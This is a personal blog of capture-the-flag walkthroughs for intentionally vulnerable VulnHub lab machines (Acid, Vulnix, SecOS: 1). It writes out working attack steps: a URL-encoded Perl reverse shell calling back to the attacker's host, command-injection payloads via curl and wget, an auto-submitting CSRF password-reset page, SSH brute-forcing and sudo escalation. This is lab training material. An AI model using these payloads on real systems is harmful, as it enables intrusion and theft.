We install the plugin to our wordpress installation and then follow the instructions at https://wordpress.org/plugins/exec-php/installation/ to run php code in the article body. Once the simple php hello world example works we use the php-reverse-shell script available at http://pentestmonkey.net/tools/web-shells/php-reverse-shell . We set up a netcat listener and sure enough we get our shell :-)

	nc -lvnp 4545
	listening on [any] 4545 ...
	connect to [192.168.116.128] from (UNKNOWN) [192.168.116.135] 57118
	Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
	02:30:03 up 3:21, 0 users, load average: 4.19, 4.26, 4.75
	USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
	uid=1(daemon) gid=1(daemon) groups=1(daemon)
	/bin/sh: 0: can't access tty; job control turned off
	$ id
	uid=1(daemon) gid=1(daemon) groups=1(daemon)

	daemon@Freshly:/home/user$ cat /etc/passwd
	cat /etc/passwd
	root:x:0:0:root:/root:/bin/bash
	daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
	bin:x:2:2:bin:/bin:/usr/sbin/nologin
	sys:x:3:3:sys:/dev:/usr/sbin/nologin
	sync:x:4:65534:sync:/bin:/bin/sync
	games:x:5:60:games:/usr/games:/usr/sbin/nologin
	man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
	lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
	mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
	news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
	uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
	proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
	www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
	backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
	list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
	irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
	gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
	nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
	libuuid:x:100:101::/var/lib/libuuid:
	syslog:x:101:104::/home/syslog:/bin/false
	messagebus:x:102:105::/var/run/dbus:/bin/false
	user:x:1000:1000:user,,,:/home/user:/bin/bash
	mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
	candycane:x:1001:1001::/home/candycane:
	# YOU STOLE MY SECRET FILE!
	# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
	daemon@Freshly:/home/user$ cat /etc/issue
	cat /etc/issue
	Ubuntu 14.04.1 LTS \n \l

view raw gistfile1.txt hosted with ❤ by GitHub

There we have our flag. A fun challenge indeed :-)

Wednesday, 27 January 2016

Walkthrough Acid server

Mission : Get the root flag on `Acid` which is a deliberately vulnerable virtual machine hosted at https://www.vulnhub.com/. The virtual machine can be downloaded at https://www.vulnhub.com/entry/acid-server,125/. I quickly loaded up the virtual machine into my VMWare Player and i was good to go !

Detailed Steps for getting root:

A nmap scan of the box reveals only one service running on a non default port. It seems that there is only this http service running on the box.

	nmap -p 1-65500 -v -A 192.168.116.131

	Starting Nmap 6.47 ( http://nmap.org ) at 2016-01-27 10:04 EST
	NSE: Loaded 118 scripts for scanning.
	NSE: Script Pre-scanning.
	Initiating ARP Ping Scan at 10:04
	Scanning 192.168.116.131 [1 port]
	Completed ARP Ping Scan at 10:04, 0.00s elapsed (1 total hosts)
	Initiating Parallel DNS resolution of 1 host. at 10:04
	Completed Parallel DNS resolution of 1 host. at 10:04, 13.00s elapsed
	Initiating SYN Stealth Scan at 10:04
	Scanning 192.168.116.131 [65500 ports]
	Discovered open port 33447/tcp on 192.168.116.131
	Completed SYN Stealth Scan at 10:04, 1.03s elapsed (65500 total ports)
	Initiating Service scan at 10:04
	Scanning 1 service on 192.168.116.131
	Completed Service scan at 10:04, 11.02s elapsed (1 service on 1 host)
	Initiating OS detection (try #1) against 192.168.116.131
	NSE: Script scanning 192.168.116.131.
	Initiating NSE at 10:05
	Completed NSE at 10:05, 0.08s elapsed
	Nmap scan report for 192.168.116.131
	Host is up (0.00059s latency).
	Not shown: 65499 closed ports
	PORT STATE SERVICE VERSION
	33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))
	\|_http-methods: GET HEAD POST OPTIONS
	\|_http-title: /Challenge
	MAC Address: 00:0C:29:CF:6D:41 (VMware)
	Device type: general purpose
	Running: Linux 3.X
	OS CPE: cpe:/o:linux:linux_kernel:3
	OS details: Linux 3.11 - 3.14
	Uptime guess: 0.293 days (since Wed Jan 27 03:03:41 2016)
	Network Distance: 1 hop
	TCP Sequence Prediction: Difficulty=261 (Good luck!)
	IP ID Sequence Generation: All zeros

	TRACEROUTE
	HOP RTT ADDRESS
	1 0.59 ms 192.168.116.131

view raw gistfile1.txt hosted with ❤ by GitHub

Upon accessing the http service on the port 33447 we are presented with a "Welcome to the world of acid" webpage.

Acid Page

Our first instinct it to always view the source code of the page to see if there is anything interesting and sure enough we are lucky as in this case we find a hidden comment - "643239334c6d70775a773d3d". It seems that its in hex . We convert hex to ascii to get "d293LmpwZw==" . The == sign at the end tells us that its base64 encoded. We are quickly able to decode the string as wow.jpg. ! Lets see if we can use this image later.

We also see that the page title is "/Challenge" which tells us that such a folder may exist on the webserver. When we visit the /Challenge folder on the webserver we see a login page prompting for an email address and password. We cant do much now so we use dirbuster against the webserver. Our dirbuster tells us there are some interesting files and folders on the webserver.

Dirbusting /Challenge directory

We also interact with the login page via the burp suite to understand better the way the form interacts with the backend webserver. We can see that the form converts the password into a hash using a api from the includes javascript files namely sha512.js and forms.js. We try to look into these files and see that these files are infact part of a php login system called "phpSecureLogin" https://github.com/peredurabefrog/phpSecureLogin. It seems that the project has been abandoned but we find that the github page (https://github.com/peredurabefrog/phpSecureLogin) lists default credentials (email : test@example.com Password: 6ZaxN2Vzm9NUJT2y ) built into the login system. We use it and we are successfully able to bypass the login screen !

Once we login we have a look at all the files that are listed by the dirbuster. When we view the cake.php we see that the page title changes to /Magic_Box hinting that there may be something with that name on the webserver.

It seems that we dont have the permission to view the /Challenge/Magic_Box directory but we run a dirbuster against it to see if it reveals anything.

Dirbusting /Magic_Box directory

We are able to find a bunch on interesting files such as low.php, tails.php , command.php etc. It seems that command.php is a console that allows us to ping another IP. We suspect a command injection vulnerability here and hence besides providing a IP address we provide another command such as "id" with the assumption that the backend code will not sanitize the input and not limit execution to a single IP address command.

Command injection

Sure enough we can see that our code is being executed.

Once we can execute code on the server we attempt to get a reverse shell. We reference the reverse shell cheat sheet http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet and select the perl reverse shell after checking that nc though installed does not support the -e option. To be able to use the perl reverse shell we must url enocde it and also since the length of the IP address field is set to max 200 we need to intercept the request in burp before forwarding it to the webserver.


	URL encoder perl reverse shell : http://meyerweb.com/eric/tools/dencoder/
	perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.116.128%22%3B%24p%3D4646%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27

view raw gistfile1.txt hosted with ❤ by GitHub

Burp intercept

Sure enough we get our low priv shell !

	nc -lvnp 4646
	listening on [any] 4646 ...
	connect to [192.168.116.128] from (UNKNOWN) [192.168.116.131] 38795
	/bin/sh: 0: can't access tty; job control turned off
	$ whoami
	www-data
	$ id
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	$ uname -a
	Linux acid 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:01 UTC 2015 i686 i686 i686 GNU/Linux
	$

view raw gistfile1.txt hosted with ❤ by GitHub

Privilege Escalation :
Escalating privileges on the box takes quite a long time. Once we have a low shell we peep into all the file present in the Challenge and Magic box directories. We see that the box is running a MySQL service and the file psl-config.php contains the database password.

	$ cat psl-config.php
	<?php
	define("HOST", "localhost"); // The host you want to connect to.
	define("USER", "root"); // The database username.
	define("PASSWORD", "mehak"); // The database password.
	define("DATABASE", "secure_login"); // The database name.

view raw gistfile1.txt hosted with ❤ by GitHub

In the database we check the secure_login database to find a few users and their password hashes and password salts. We are able to crack the hashes ( saman & Vivek) but since the passwords are salted we wont be able to crack it. At this point we give up on the database. We slowly follow the priv escalation guide https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ till we finally see an interesting file on the box via enumerating all the files for the user acid and user Vivek on the box.

	$ find / -user acid 2>/dev/null
	/sbin/raw_vs_isi/hint.pcapng
	/bin/pwn_me
	/bin/pwn_me/chkrootkit.lsm
	/bin/pwn_me/chkrootkit
	/bin/pwn_me/README.chkwtmp
	/bin/pwn_me/ACKNOWLEDGMENTS
	/bin/pwn_me/chkdirs.c
	/bin/pwn_me/ifpromisc.c
	/bin/pwn_me/Makefile
	..................
	...................

view raw gistfile1.txt hosted with ❤ by GitHub

The pcap file is interesting and we download it and open it in wireshark. We guess that we should look into the TCP communication captured on the network interface and hence set the wireshark filter to the same. Then we follow the TCP stream to see the data exchanged in the session. And sure enough we get our next clue.

Looking at the message we guess the user saman password. Also always check if the user is in the sudoers list. This gives us root !

	www-data@acid:/sbin/raw_vs_isi$ su saman
	su saman
	Password: 1337hax0r

	saman@acid:/sbin/raw_vs_isi$ id
	id
	uid=1001(saman) gid=1001(saman) groups=1001(saman)
	saman@acid:/sbin/raw_vs_isi$ whoami
	whoami
	saman
	saman@acid:~$

	saman@acid:~$ sudo /bin/bash
	sudo /bin/bash
	[sudo] password for saman: 1337hax0r

	root@acid:~#

	root@acid:~# id
	id
	uid=0(root) gid=0(root) groups=0(root)
	root@acid:~#

view raw gistfile1.txt hosted with ❤ by GitHub

Wednesday, 13 January 2016

Walkthrough Vulnix

Mission : Get the root flag on `Pipe` which is a deliberately vulnerable virtual machine hosted at https://www.vulnhub.com/. The virtual machine can be downloaded at https://www.vulnhub.com/entry/hacklab-vulnix,48/. I quickly loaded up the virtual machine into my VMWare Player and i was good to go !

Detailed Steps for getting root:

A nmap scan of the box reveals a number of services running on the box such as ssh, smtp, finger, pop3, imap , rlogin , rexec, rshell and nfs.

	PORT STATE SERVICE VERSION
	22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
	\| ssh-hostkey:
	\| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
	\| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
	\|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
	25/tcp open smtp Postfix smtpd
	\|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
	\| ssl-cert: Subject: commonName=vulnix
	\| Issuer: commonName=vulnix
	\| Public Key type: rsa
	\| Public Key bits: 2048
	\| Not valid before: 2012-09-02T16:40:12+00:00
	\| Not valid after: 2022-08-31T16:40:12+00:00
	\| MD5: 58e3 f1ac fef6 b6d1 744c 836f ba24 4f0a
	\|_SHA-1: 712f 69ba 8c54 32e5 711c 898b 55ab 0a83 44a0 420b
	\|_ssl-date: 2016-01-10T20:23:58+00:00; +8h00m00s from local time.
	79/tcp open finger Linux fingerd
	\|_finger: No one logged on.
	110/tcp open pop3 Dovecot pop3d
	\|_pop3-capabilities: TOP CAPA RESP-CODES SASL UIDL STLS PIPELINING
	111/tcp open rpcbind 2-4 (RPC #100000)
	\| rpcinfo:
	\| program version port/proto service
	\| 100000 2,3,4 111/tcp rpcbind
	\| 100000 2,3,4 111/udp rpcbind
	\| 100003 2,3,4 2049/tcp nfs
	\| 100003 2,3,4 2049/udp nfs
	\| 100005 1,2,3 33679/tcp mountd
	\| 100005 1,2,3 53650/udp mountd
	\| 100021 1,3,4 33225/tcp nlockmgr
	\| 100021 1,3,4 54495/udp nlockmgr
	\| 100024 1 47591/udp status
	\| 100024 1 51009/tcp status
	\| 100227 2,3 2049/tcp nfs_acl
	\|_ 100227 2,3 2049/udp nfs_acl
	143/tcp open imap Dovecot imapd
	\|_imap-capabilities: IDLE have ENABLE ID listed LOGIN-REFERRALS post-login more capabilities Pre-login OK LOGINDISABLEDA0001 STARTTLS SASL-IR LITERAL+ IMAP4rev1
	512/tcp open exec netkit-rsh rexecd
	513/tcp open login?
	514/tcp open shell?
	993/tcp open ssl/imap Dovecot imapd
	\|_imap-capabilities: IDLE have ENABLE ID LOGIN-REFERRALS post-login more listed capabilities OK Pre-login IMAP4rev1 SASL-IR LITERAL+ AUTH=PLAINA0001
	\| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
	\| Issuer: commonName=vulnix/organizationName=Dovecot mail server
	\| Public Key type: rsa
	\| Public Key bits: 2048
	\| Not valid before: 2012-09-02T16:40:22+00:00
	\| Not valid after: 2022-09-02T16:40:22+00:00
	\| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
	\|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
	\|_ssl-date: 2016-01-10T20:23:48+00:00; +8h00m01s from local time.
	995/tcp open ssl/pop3 Dovecot pop3d
	\|_pop3-capabilities: TOP CAPA RESP-CODES USER UIDL SASL(PLAIN) PIPELINING
	\| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
	\| Issuer: commonName=vulnix/organizationName=Dovecot mail server
	\| Public Key type: rsa
	\| Public Key bits: 2048
	\| Not valid before: 2012-09-02T16:40:22+00:00
	\| Not valid after: 2022-09-02T16:40:22+00:00
	\| MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
	\|_SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
	\|_ssl-date: 2016-01-10T20:23:48+00:00; +8h00m01s from local time.
	2049/tcp open nfs 2-4 (RPC #100003)
	\| rpcinfo:
	\| program version port/proto service
	\| 100000 2,3,4 111/tcp rpcbind
	\| 100000 2,3,4 111/udp rpcbind
	\| 100003 2,3,4 2049/tcp nfs
	\| 100003 2,3,4 2049/udp nfs
	\| 100005 1,2,3 33679/tcp mountd
	\| 100005 1,2,3 53650/udp mountd
	\| 100021 1,3,4 33225/tcp nlockmgr
	\| 100021 1,3,4 54495/udp nlockmgr
	\| 100024 1 47591/udp status
	\| 100024 1 51009/tcp status
	\| 100227 2,3 2049/tcp nfs_acl
	\|_ 100227 2,3 2049/udp nfs_acl
	MAC Address: 00:0C:29:FA:14:AD (VMware)
	Device type: general purpose
	Running: Linux 2.6.X\|3.X
	OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
	OS details: Linux 2.6.32 - 3.10
	Uptime guess: 198.841 days (since Thu Jun 25 12:13:22 2015)
	Network Distance: 1 hop
	TCP Sequence Prediction: Difficulty=262 (Good luck!)
	IP ID Sequence Generation: All zeros
	Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

view raw gistfile1.txt hosted with ❤ by GitHub

Our attention is drawn to a number of services which we would typically not see exposed such as finger, rlogin services and nfs.NFS protocol allows a user on a client system to access a folder on the network as if it were present locally. Poorly configured NFS services are known be exploitable.[ If we remember there is a exercise in Metaspoitable that deals excursively on attacking the NFS protocol for getting root]. Hence we go for this service and enumerate if we can mount a share locally.

We see the the /home/vulnix directory can be mounted and we mount it on our attacking box. However we are unable to see the contents of the directory as we keep getting a permission error. We get this error because we are root on our attacking machine and we are trying to access a non root owned directory on the target system. We guess that this is because the NFS /etc/exports file (https://www.centos.org/docs/5/html/Deployment_Guide-en-US/s1-nfs-server-config-exports.html) may have the root_squash permission turned on which squashes the permissions of the root client to the lowest user to prevent unauthorized alteration by a client on the nfs shared directory. In order to view the contents in the mounted directory we need to acess the nfs drive as a user with the same uid and guid as the vulnix user on the target box. Since we dont know the uid and guid of the vulnix user we do some further enumeration on the box.

We see that the smtp service is running of the box. There exisits a metasploit auxilliary module that helps us enumerate all the valid users accounts on the smtp server. We use this module as follows

	msf auxiliary(smtp_enum) > info

	Name: SMTP User Enumeration Utility
	Module: auxiliary/scanner/smtp/smtp_enum
	License: Metasploit Framework License (BSD)
	Rank: Normal

	Provided by:
	==[ Alligator Security Team ]==
	Heyder Andrade <heyder@alligatorteam.org>
	nebulus

	Basic options:
	Name Current Setting Required Description
	---- --------------- -------- -----------
	RHOSTS yes The target address range or CIDR identifier
	RPORT 25 yes The target port
	THREADS 1 yes The number of concurrent threads
	UNIXONLY true yes Skip Microsoft bannered servers when testing unix users
	USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt yes The file that contains a list of probable users accounts.

	Description:
	The SMTP service has two internal commands that allow the
	enumeration of users: VRFY (confirming the names of valid users) and
	EXPN (which reveals the actual address of users aliases and lists of
	e-mail (mailing lists)). Through the implementation of these SMTP
	commands can reveal a list of valid users.

	References:
	http://www.ietf.org/rfc/rfc2821.txt
	http://www.osvdb.org/12551
	http://cvedetails.com/cve/1999-0531/

	msf auxiliary(smtp_enum) > set RHOSTS 192.168.116.129
	RHOSTS => 192.168.116.129
	msf auxiliary(smtp_enum) > run

	[*] 192.168.116.129:25 Banner: 220 vulnix ESMTP Postfix (Ubuntu)
	[+] 192.168.116.129:25 Users found: , backup, bin, daemon, games, gnats, irc, libuuid, list, lp, mail, man, messagebus, news, nobody, postmaster, proxy, sshd, sync, sys, syslog, user, uucp, www-data
	[*] Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed
	msf auxiliary(smtp_enum) >

view raw gistfile1.txt hosted with ❤ by GitHub

The module has identified a number of user accounts on the box. The `user` account catches our attention. We guess that accounts maye be reused and use the finger service to determine if its possible to login to this box via the `user` account.

	finger user@192.168.116.129
	Login: user Name: user
	Directory: /home/user Shell: /bin/bash
	Last login Sun Jan 10 18:32 (GMT) on pts/1 from 192.168.116.128
	No mail.
	No Plan.

	Login: dovenull Name: Dovecot login user
	Directory: /nonexistent Shell: /bin/false
	Never logged in.
	No mail.
	No Plan.

view raw gistfile1.txt hosted with ❤ by GitHub

Clearly an account called `user` can be used to login to the box. With no other information available we attempt to bruteforce the ssh service with this user account. After a few minutes we are able to bruteforce successfully ! ! The credentials for this account are user:letmein . Now we can login to the box as `user`.

Once we login we see another user called vulnix. We take note of the uid and giud of this user (2008 in both case). We shall attempt to create a user with the same uid and guid on our client box. Hopefully this will solve out permissions problem and we will be able to elevate our priv to vulnix .

	user@vulnix:~$ cat /etc/passwd
	root:x:0:0:root:/root:/bin/bash
	.....
	user:x:1000:1000:user,,,:/home/user:/bin/bash
	vulnix:x:2008:2008::/home/vulnix:/bin/bash
	statd:x:109:65534::/var/lib/nfs:/bin/false


	user@vulnix:~$ cat /etc/group
	root:x:0:
	daemon:x:1:
	.....
	lpadmin:x:115:
	sambashare:x:116:
	vulnix:x:2008:
	user@vulnix:~$

view raw gistfile1.txt hosted with ❤ by GitHub

Now on the attacking box we create a testuser with the same uid and guid .

	id test
	uid=2008(test) gid=2008(testers) groups=2008(testers)

view raw gistfile1.txt hosted with ❤ by GitHub

Now after we mount the /home/vulnix directory we no longer see the permission problem !

Saturday, 9 January 2016

Walkthrough SecOS: 1

Mission : Get the root flag on `Pipe` which is a deliberately vulnerable virtual machine hosted at https://www.vulnhub.com/. The virtual machine can be downloaded at https://www.vulnhub.com/entry/secos-1,88/. I quickly loaded up the virtual machine into my VMWare Player and i was good to go !

Detailed Steps for getting root:

I ran a quick nmap scan to identify the Ip address of the Pipe VM. I use `host-only` networking for both my Pipe Vm and Kali box.

	# arp-scan --localnet
	Interface: eth0, datalink type: EN10MB (Ethernet)
	Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
	192.168.28.1 00:50:56:c0:00:01 VMware, Inc.
	192.168.28.138 00:0c:29:9a:5b:b1 VMware, Inc.
	192.168.28.254 00:50:56:eb:e9:c7 VMware, Inc.

	3 packets received by filter, 0 packets dropped by kernel
	Ending arp-scan 1.9: 256 hosts scanned in 2.086 seconds (122.72 hosts/sec). 3 responded

view raw gistfile1.txt hosted with ❤ by GitHub

We identify the IP address of the new VM as 192.168.28.138.

A nmap scan of the box shows that the box is running a http service on port 8081 and a ssh service on 22.

	Host is up (0.00065s latency).
	Not shown: 998 closed ports
	PORT STATE SERVICE VERSION
	22/tcp open ssh (protocol 2.0)
	\| ssh-hostkey:
	\| 1024 9b:d9:32:f5:1d:19:88:d3:e7:af:f0:4e:21:76:7a:c8 (DSA)
	\| 2048 90:b0:3d:99:ed:5b:1b:e1:d4:e6:b5:dd:e9:70:89:f5 (RSA)
	\|_ 256 78:2a:d9:e3:63:83:24:dc:2a:d4:f6:4a:ac:2c:70:5a (ECDSA)
	8081/tcp open http Node.js (Express middleware)
	\|_http-methods: GET
	\|_http-title: Secure Web App
	1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
	SF-Port22-TCP:V=6.47%I=7%D=1/8%Time=56908E80%P=i686-pc-linux-gnu%r(NULL,27
	SF:,"SSH-2\.0-OpenSSH_6\.6p1\x20Ubuntu-2ubuntu1\r\n");
	MAC Address: 00:0C:29:9A:5B:B1 (VMware)
	Device type: general purpose
	Running: Linux 3.X
	OS CPE: cpe:/o:linux:linux_kernel:3
	OS details: Linux 3.11 - 3.14
	Uptime guess: 198.048 days (since Wed Jun 24 23:28:37 2015)
	Network Distance: 1 hop
	TCP Sequence Prediction: Difficulty=251 (Good luck!)
	IP ID Sequence Generation: All zeros

view raw gistfile1.txt hosted with ❤ by GitHub

We run nikto againts the webserver but dont find anything of much interest. We then dirbust the webserver which reveals a bunch of interesting directories that we should look into.

It seems that the vulnerable application allows us to create a user account and have a look at the various pages on the website. We see that among other things there seems to be 3 users on the box one of whom is the administrator. Also there is a way to send messages to the admin.

We also see an About page that tells us that the site has been developed using Node.js and MangoDB. At this point we try the an authentication bypass seen in Node.js and MangoDB systems. A good discussion of it is here : Hacking Node.js and MangoDB http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html: . It seems that the box is not vulnerable to this bypass. We begin to observer the webapp more closely and find that the login page source code has comment which is a hint.

We have a look at the /hint page and its source code which reveals that we should launch a CSRF kinda attack on the administrator.

The hint page tells us that the administrator will visit any site running on 127.0.0.1 if he is asked to do so. The hint is clear that we should feed a URL to the administrator to see. This can be done via the messaging feature of the webapp which allows us the send messages to the administrator. Relooking at the webapp we see that there is a feature to change the password. We decicde to trick the admin into changing his password to our specified one. For this we create a HTML page with hidden inputs and POST the data to the /change-password .

	<html>
	<body>
	<form name="changepass" method="post" action="http://127.0.0.1:8081/change-password">
	<input type="hidden" name="username" value="spiderman">
	<input type="hidden" name="password" value="abc123">
	</form>
	<script type="text/javascript">
	document.changepass.submit();
	</script>
	</body>
	</html>

view raw gistfile1.txt hosted with ❤ by GitHub

We know ask the admin to view this page by sending him a message .

We hope that when the admin visits this page his password will get reset and we can login. Well after a few minutes we try logging in as admin and we see that our little trick has worked !

We login to the admins message board and see that he has a message from a user 'pirate` who claims to have cracked his password.

We try ssh'ing into the box with these credentials and we are immediately logged in !

Once we login we see that there a bunch of interesting files in the users home directory.

	spiderman@SecOS-1:~/vnwa$ ls -lrt
	total 44
	-rw-rw-r-- 1 spiderman spiderman 559 May 4 2014 package.json
	-rw-rw-r-- 1 spiderman spiderman 1070 May 4 2014 LICENSE
	drwxrwxr-x 2 spiderman spiderman 4096 May 4 2014 views
	drwxrwxr-x 6 spiderman spiderman 4096 May 4 2014 node_modules
	drwxrwxr-x 4 spiderman spiderman 4096 May 4 2014 public
	-rwxrwxr-x 1 spiderman spiderman 7772 May 4 2014 server.js
	drwxrwxr-x 2 spiderman spiderman 4096 May 5 2014 lib
	drwxrwxr-x 2 spiderman spiderman 4096 May 7 2014 scripts
	-rwxrwxr-x 1 spiderman spiderman 1981 Jan 10 01:00 internalServer.js.2
	-rw-rw-r-- 1 spiderman spiderman 0 Jan 10 01:22 headers
	-rwxrwxr-x 1 spiderman spiderman 1981 Jan 10 01:29 internalServer.js
	spiderman@SecOS-1:~/vnwa$ ls -l views/
	total 64
	-rw-rw-r-- 1 spiderman spiderman 591 May 4 2014 about.ejs
	-rw-rw-r-- 1 spiderman spiderman 13861 May 4 2014 bootstrap.ejs
	-rw-rw-r-- 1 spiderman spiderman 740 May 4 2014 change-password.ejs
	-rw-rw-r-- 1 spiderman spiderman 18 May 4 2014 footer.ejs
	-rw-rw-r-- 1 spiderman spiderman 2048 May 4 2014 header.ejs
	-rw-rw-r-- 1 spiderman spiderman 548 May 4 2014 hint.ejs
	-rw-rw-r-- 1 spiderman spiderman 498 May 4 2014 index.ejs
	-rw-rw-r-- 1 spiderman spiderman 754 May 4 2014 login.ejs
	-rw-rw-r-- 1 spiderman spiderman 690 May 4 2014 messages.ejs
	-rw-rw-r-- 1 spiderman spiderman 2114 May 4 2014 ping.ejs
	-rw-rw-r-- 1 spiderman spiderman 910 May 4 2014 send-message.ejs
	-rw-rw-r-- 1 spiderman spiderman 697 May 4 2014 sign-up.ejs
	-rw-rw-r-- 1 spiderman spiderman 646 May 4 2014 users.ejs
	spiderman@SecOS-1:~/vnwa$

view raw gistfile1.txt hosted with ❤ by GitHub

If we do a quick directory listing 2 things stand out. i) There is an internalServer running as root on the box ii) there is a additional ping.ejs file which is not normally visible via the public facing web interface.

We look at the contents of both the internerlServer and ping.ejs files.

	<body role="document">

	<!-- Fixed navbar -->
	<div class="navbar navbar-inverse navbar-fixed-top" role="navigation">
	<div class="container">
	<div class="navbar-header">
	<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
	<span class="sr-only">Toggle navigation</span>
	</button>
	<a class="navbar-brand" href="/">Internal admin tools</a>
	</div>
	<div class="navbar-collapse collapse">
	<ul class="nav navbar-nav">
	</ul>
	</div><!--/.nav-collapse -->
	</div>
	</div>

	<div class="container">
	<form class="form-signin" action="/" method="POST">
	<h4 class="form-signin-heading">Enter the IP you want to ping</h4>
	<input type="text" class="input-block-level" placeholder="127.0.0.1" name="ip"><br />
	<button class="btn btn-large btn-primary" type="submit">Ping !</button>
	</form>

	<% if (typeof message != "undefined" && message != null && message != "") { %>
	<div class="panel panel-default">
	<div class="panel-heading">
	<h3 class="panel-title">Ping result</h3>
	</div>
	<div class="panel-body"><%= message %></div>
	</div>
	<% } %>

	</div> <!-- /container -->

view raw gistfile1.txt hosted with ❤ by GitHub

It seems that besides the public facing webapp there is an additonal server running on the box on port 9000. This server provides a Ping capability for the admin to maybe ping other systems. When we look at the code for the ping service we see that the exec api is called with the user provided IP address without any input checks. We can inject code here as the application does not sanitize the input data.

We can launch the command injection both via the web browser or the command line. Let see both approaches .

a) Command line : We can use wget or curl to post data to the internal server and inject our code in the post request.

	wget --post-data="ip=1;id" localhost:9000
	--2016-01-10 01:44:34-- http://localhost:9000/
	Resolving localhost (localhost)... ::1, 127.0.0.1
	Connecting to localhost (localhost)\|::1\|:9000... failed: Connection refused.
	Connecting to localhost (localhost)\|127.0.0.1\|:9000... connected.
	HTTP request sent, awaiting response... 200 OK
	Length: 2048 (2.0K) [text/html]
	.......


	<div class="panel panel-default">
	<div class="panel-heading">
	<h3 class="panel-title">Ping result</h3>
	</div>
	<div class="panel-body">uid=0(root) gid=0(root) groups=0(root)
	</div>
	</div>


	</div> <!-- /container -->

view raw gistfile1.txt hosted with ❤ by GitHub

Here we send a post request with a ip address =1 and inject our 'id' command along with the request .

Similarly we can use curl to post data as well

	curl --data "ip=;ls -l ; cat /root/flag.txt" localhost:9000
	....
	.....
	/div>
	<div class="panel-body">total 77
	drwxr-xr-x 2 root root 4096 Apr 25 2014 bin
	drwxr-xr-x 4 root root 1024 Apr 25 2014 boot
	drwxr-xr-x 15 root root 4100 Jan 10 00:40 dev
	drwxr-xr-x 90 root root 4096 Jan 10 00:40 etc
	drwxr-xr-x 4 root root 4096 Apr 25 2014 home
	lrwxrwxrwx 1 root root 33 Apr 25 2014 initrd.img -> boot/initrd.img-3.13.0-24-generic
	drwxr-xr-x 21 root root 4096 Apr 25 2014 lib
	drwx------ 2 root root 16384 Apr 25 2014 lost+found
	drwxr-xr-x 3 root root 4096 Apr 25 2014 media
	drwxr-xr-x 2 root root 4096 Apr 11 2014 mnt
	drwxr-xr-x 4 root root 4096 Apr 25 2014 opt
	dr-xr-xr-x 312 root root 0 Jan 10 00:40 proc
	drwx------ 2 root root 4096 May 5 2014 root
	drwxr-xr-x 18 root root 640 Jan 10 00:41 run
	drwxr-xr-x 2 root root 12288 Apr 25 2014 sbin
	drwxr-xr-x 2 root root 4096 Apr 16 2014 srv
	dr-xr-xr-x 13 root root 0 Jan 10 00:40 sys
	drwxrwxrwt 2 root root 4096 Jan 10 01:42 tmp
	drwxr-xr-x 10 root root 4096 Apr 25 2014 usr
	drwxr-xr-x 12 root root 4096 Apr 25 2014 var
	lrwxrwxrwx 1 root root 30 Apr 25 2014 vmlinuz -> boot/vmlinuz-3.13.0-24-generic
	Hey,

	Congrats, you did it !

	The flag for this first (VM) is: MickeyMustNotDie.
	Keep this flag because it will be needed for the next VM.

	If you liked the Web application, the code is available on Github.
	(https://github.com/PaulSec/VNWA)

	There should be more VMs to come in the next few weeks/months.

	Twitter: @PaulWebSec
	GitHub : PaulSec
	</div>
	</div>


	</div> <!-- /container -->

	</body>
	</html>

view raw gistfile1.txt hosted with ❤ by GitHub

